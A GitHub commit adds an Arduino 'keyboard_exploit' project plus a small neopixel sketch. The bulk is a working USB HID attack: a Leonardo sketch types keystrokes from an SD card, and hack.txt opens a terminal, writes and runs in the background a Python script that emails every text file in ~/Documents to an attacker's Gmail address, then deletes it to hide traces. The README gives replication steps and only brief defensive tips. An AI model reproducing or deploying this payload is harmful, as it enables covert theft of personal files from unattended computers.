added sketch for neopixel ring, added keyboard exploit with updated r…

…eadme
danionescu0 · Jan 28, 2018 · 5d1fc47 · 5d1fc47
1 parent 2b47903
commit 5d1fc47
Show file tree

Hide file tree

Showing 7 changed files with 317 additions and 2 deletions.
diff --git a/.gitignore b/.gitignore
@@ -1,3 +1,5 @@
+\.idea
+*.pyc
 # Object files
 *.o
 *.ko

diff --git a/README.md b/README.md
@@ -3,7 +3,7 @@
 ### TextMotorCommandsInterpretter
 
 Given a string command representing coordonates for X, Y axys, the library transforms
-those on percentage of power for a two motor robor/car.
+those on percentage of power for a two motor robot/car.
 
 For the X (direction) between -50 and 50, and Y (power) between -50 and 50
 
@@ -37,4 +37,89 @@ boolean direction motorCommandsInterpretter.getDirection();
 // percentLeftMotor will be 0.17
 // percentRightMotor will be 0.32
 // direction will be true
-````
+````
+
+# Projects
+
+## neopixel_ring_gyroscope
+
+Full turorial here: https://www.instructables.com/id/Gyroscope-Fun-With-Neopixel-Ring/
+
+![ifttt.png](https://github.com/danionescu0/arduino/blob/master/projects/neopixel_ring_gyroscope/sketch_bb.png)
+
+## keyboard_exploit
+
+In this project i'm using an arduino leonardo to simulate a possible USB attack using HID 
+(humain interface device).
+
+
+**Important!: You can defend against this kind of attack by:**
+
+* disabling USB ports
+
+* locking your computer when your're away
+
+The arduino leonardo can act like a keyboard and mouse, so the attack will be mounted like this:
+
+**Components:**
+* arduino leonardo
+* usb cable
+* micro usb card reader
+* sd card
+* push button
+* male-female, female-female jumper cables
+
+**How will the attack work:**
+
+1. When the button is pressed, the leonardo will read the sd card using a sd card reader. 
+A special file containg keys and key combination will be present on the card. 
+The file name is "hack.txt".
+
+The file can contain raw text, and it will passed to the keyboard just as it is. 
+
+Also it can contain special commands like "Sleep::" and "Command::".
+
+A line like: 
+````
+Sleep::200
+````
+means a sleep of 200 ms
+
+A line like:
+````
+Command::KEY_LEFT_CTRL,KEY_LEFT_ALT,t
+````
+means left ctrl pressed, left alt pressed, t pressed and all released
+
+You can check all special keys here: https://www.arduino.cc/en/Reference/KeyboardModifiers
+
+2. Leonardo will read line by line, and interpret the commands and emulate the keys on the keyboard
+
+My "hack.py" contains a combination of keys that does the following (for UBUNTU linux):
+
+a. opens a terminal
+b. opens a python file for creation using vi
+c. writes a python script inside that collects all text files inside of documents home folder
+ and sends them over to a specified gmail address
+d. runs the file in the background
+e. deletes the file
+f. closes the terminal
+
+This whole thing runs in a few seconds and doesn't leave traces.
+
+**To replicate the project:**
+
+a. assemble the arduino leonardo: 
+connect the button to digital pin 8, connect the card reader and the usb cable
+b. edit the hack.txt file and modify the following lines with email and passwords:
+````
+smtp_user = 'sender_email_address'
+smtp_pass = 'password'
+to_address = 'receiver_email_address'
+````
+c. format the sd card using fat16 or fat32
+e. copy the hack.txt file
+e. ensure you have a test txt file in the Documents folder on your computer
+f. plug the arduiono and press the button
+
+
diff --git a/projects/keyboard_exploit/hack.py b/projects/keyboard_exploit/hack.py
@@ -0,0 +1,41 @@
+import smtplib
+import glob, os
+from email.MIMEMultipart import MIMEMultipart
+from email.MIMEBase import MIMEBase
+from email.MIMEText import MIMEText
+from email.Utils import COMMASPACE, formatdate
+from email import Encoders
+
+smtp_user = 'sender_email_addr'
+smtp_pass = 'sender_password'
+to_address = 'receiver_address'
+scan_documents_location = '~/Documents/'
+from_address = smtp_user
+
+subject = body = 'Files from hacked computer'
+header = 'To :' + to_address + '\n' + 'From : ' + from_address + '\n' + 'Subject : ' + subject + '\n'
+
+def sendMail(to, subject, text, files=[]):
+    msg = MIMEMultipart()
+    msg['From'] = smtp_user
+    msg['To'] = COMMASPACE.join(to)
+    msg['Date'] = formatdate(localtime=True)
+    msg['Subject'] = subject
+    msg.attach( MIMEText(text) )
+    for file in files:
+        part = MIMEBase('application', "octet-stream")
+        part.set_payload( open(file,"rb").read() )
+        Encoders.encode_base64(part)
+        part.add_header('Content-Disposition', 'attachment; filename="%s"'
+                       % os.path.basename(file))
+        msg.attach(part)
+
+    server = smtplib.SMTP('smtp.gmail.com:587')
+    server.ehlo_or_helo_if_needed()
+    server.starttls()
+    server.ehlo_or_helo_if_needed()
+    server.login(smtp_user, smtp_pass)
+    server.sendmail(smtp_user, to, msg.as_string())
+    server.quit()
+
+sendMail([to_address], subject, body, glob.glob("{0}/*.*txt".format(scan_documents_location)))
diff --git a/projects/keyboard_exploit/hack.txt b/projects/keyboard_exploit/hack.txt
@@ -0,0 +1,56 @@
+Command::KEY_LEFT_CTRL,KEY_LEFT_ALT,t
+Sleep::200
+vi hack.py
+Sleep::200
+Command::KEY_INSERT
+import smtplib
+import glob, os
+from email.MIMEMultipart import MIMEMultipart
+from email.MIMEBase import MIMEBase
+from email.MIMEText import MIMEText
+from email.Utils import COMMASPACE, formatdate
+from email import Encoders
+
+smtp_user = 'sender_email_addr'
+smtp_pass = 'sender_password'
+to_address = 'receiver_address'
+scan_documents_location = '~/Documents/'
+from_address = smtp_user
+
+subject = body = 'Files from hacked computer'
+header = 'To :' + to_address + '\n' + 'From : ' + from_address + '\n' + 'Subject : ' + subject + '\n'
+
+def sendMail(to, subject, text, files=[]):
+    msg = MIMEMultipart()
+    msg['From'] = smtp_user
+    msg['To'] = COMMASPACE.join(to)
+    msg['Date'] = formatdate(localtime=True)
+    msg['Subject'] = subject
+    msg.attach( MIMEText(text) )
+    for file in files:
+        part = MIMEBase('application', "octet-stream")
+        part.set_payload( open(file,"rb").read() )
+        Encoders.encode_base64(part)
+        part.add_header('Content-Disposition', 'attachment; filename="%s"'
+                       % os.path.basename(file))
+        msg.attach(part)
+
+    server = smtplib.SMTP('smtp.gmail.com:587')
+    server.ehlo_or_helo_if_needed()
+    server.starttls()
+    server.ehlo_or_helo_if_needed()
+    server.login(smtp_user, smtp_pass)
+    server.sendmail(smtp_user, to, msg.as_string())
+    server.quit()
+
+sendMail([to_address], subject, body, glob.glob("{0}/*.*txt".format(scan_documents_location)))
+Sleep::50
+Command::KEY_ESC
+Sleep::100
+:x
+Sleep::200
+nohup python hack.py &
+Sleep::500
+rm -rf hack.py
+Sleep::200
+Command::KEY_LEFT_ALT,KEY_F4
diff --git a/projects/keyboard_exploit/keyboard_exploit.ino b/projects/keyboard_exploit/keyboard_exploit.ino
@@ -0,0 +1,131 @@
+#include "Keyboard.h"
+#include <SPI.h>
+#include <SD.h>
+
+String filenameOnCard = "hack.txt";
+String sleepCommandStartingPoint = "Sleep::";
+String commandStartingPoint = "Command::";
+int delayBetweenCommands = 10;
+const int buttonPin = 8;   
+const int chipSelect = 10;       
+int previousButtonState = HIGH;  
+
+void setup() {
+    pinMode(buttonPin, INPUT);
+    Serial.begin(9600);
+    Keyboard.begin();
+    if (!SD.begin(chipSelect)) {
+        Serial.println("Card failed, or not present!");
+        return;
+    }
+}
+
+void loop() {
+    int buttonState = digitalRead(buttonPin);
+    if ((buttonState != previousButtonState) && (buttonState == HIGH)) {
+      sdFileToKeyboard();
+      Serial.println("Uploaded!");
+      delay(500);
+    }
+    previousButtonState = buttonState;
+}
+
+void sdFileToKeyboard() {
+    File dataFile = SD.open(filenameOnCard);
+    if (!dataFile) {
+      Serial.println("The specified filename is not present on SD card, check filenameOnCard !");
+    }
+    String line;
+    while (dataFile.available()) {
+        line = dataFile.readStringUntil('\n');
+        Serial.println(line);
+        sendToKeyboard(line);
+    }
+    dataFile.close();
+}
+
+void sendToKeyboard(String line) {
+    String workingLine = line;
+    if (workingLine.indexOf(sleepCommandStartingPoint) != -1) {
+        sleepFor(line);
+        return;      
+    }
+    if (workingLine.indexOf(commandStartingPoint) == -1) {
+        Serial.print("Text:");Serial.println(line);
+        Keyboard.println(line);
+        pressEnter();
+        return;        
+    }    
+
+    Serial.println("Command:");
+    int charPosition = commandStartingPoint.length();
+    int lineLength = line.length();
+    workingLine += ",";
+
+    while (workingLine != "") {
+        workingLine = workingLine.substring(charPosition);
+        Serial.print("WorkingLine:");Serial.println(workingLine);
+        int specialCommandDelimiterPosition = workingLine.indexOf(",");
+        String command = workingLine.substring(0, specialCommandDelimiterPosition);
+        charPosition = specialCommandDelimiterPosition + 1;
+        if (command != "") {
+            Serial.print("Command found:");Serial.println(command);
+            Keyboard.press(getCommandCode(command));
+            delay(delayBetweenCommands);
+        }
+    }
+    Keyboard.releaseAll();
+    delay(delayBetweenCommands);
+}
+
+void pressEnter() {
+    Keyboard.press(KEY_RETURN);
+    Keyboard.releaseAll();
+}
+
+void sleepFor(String line) {
+    int sleepAmount = line.substring(sleepCommandStartingPoint.length(), line.length()).toInt();
+    Serial.print("Sleeping for:");Serial.println(sleepAmount);
+    delay(sleepAmount);
+}
+
+char getCommandCode(String text) {
+    char textCharacters[2]; 
+    text.toCharArray(textCharacters, 2);
+    char code = textCharacters[0];
+
+    code = (text == "KEY_LEFT_CTRL") ? KEY_LEFT_CTRL : code;
+    code = (text == "KEY_LEFT_SHIFT") ? KEY_LEFT_SHIFT : code;
+    code = (text == "KEY_LEFT_ALT") ? KEY_LEFT_ALT : code;
+    code = (text == "KEY_UP_ARROW") ? KEY_UP_ARROW : code;
+    code = (text == "KEY_DOWN_ARROW") ? KEY_DOWN_ARROW : code;
+    code = (text == "KEY_LEFT_ARROW") ? KEY_LEFT_ARROW : code;
+    code = (text == "KEY_RIGHT_ARROW") ? KEY_RIGHT_ARROW : code;
+    code = (text == "KEY_RIGHT_GUI") ? KEY_RIGHT_GUI : code;
+    code = (text == "KEY_BACKSPACE") ? KEY_BACKSPACE : code;
+    code = (text == "KEY_TAB") ? KEY_TAB : code;
+    code = (text == "KEY_RETURN") ? KEY_RETURN : code;
+    code = (text == "KEY_ESC") ? KEY_ESC : code;
+    code = (text == "KEY_INSERT") ? KEY_INSERT : code;
+    code = (text == "KEY_DELETE") ? KEY_DELETE : code;
+    code = (text == "KEY_PAGE_UP") ? KEY_PAGE_UP : code;
+    code = (text == "KEY_PAGE_DOWN") ? KEY_PAGE_DOWN : code;
+    code = (text == "KEY_HOME") ? KEY_HOME : code;
+    code = (text == "KEY_END") ? KEY_END : code;
+    code = (text == "KEY_CAPS_LOCK") ? KEY_CAPS_LOCK : code;
+    code = (text == "KEY_F1") ? KEY_F1 : code;
+    code = (text == "KEY_F2") ? KEY_F2 : code;
+    code = (text == "KEY_F3") ? KEY_F3 : code;
+    code = (text == "KEY_F4") ? KEY_F4 : code;
+    code = (text == "KEY_F5") ? KEY_F5 : code;
+    code = (text == "KEY_F6") ? KEY_F6 : code;
+    code = (text == "KEY_F7") ? KEY_F7 : code;
+    code = (text == "KEY_F8") ? KEY_F8 : code;
+    code = (text == "KEY_F9") ? KEY_F9 : code;
+    code = (text == "KEY_F10") ? KEY_F10 : code;
+    code = (text == "KEY_F11") ? KEY_F1 : code;
+    code = (text == "KEY_F12") ? KEY_F2 : code;
+
+    return code;
+}
+
diff --git a/projects/neopixel_ring_gyroscope/sketch.fzz b/projects/neopixel_ring_gyroscope/sketch.fzz
diff --git a/projects/neopixel_ring_gyroscope/sketch_bb.png b/projects/neopixel_ring_gyroscope/sketch_bb.png
-Original file line number
+Diff line change
@@ -1,3 +1,5 @@
+    \.idea
+    *.pyc
     # Object files
     *.o
     *.ko
@@ Expand Down @@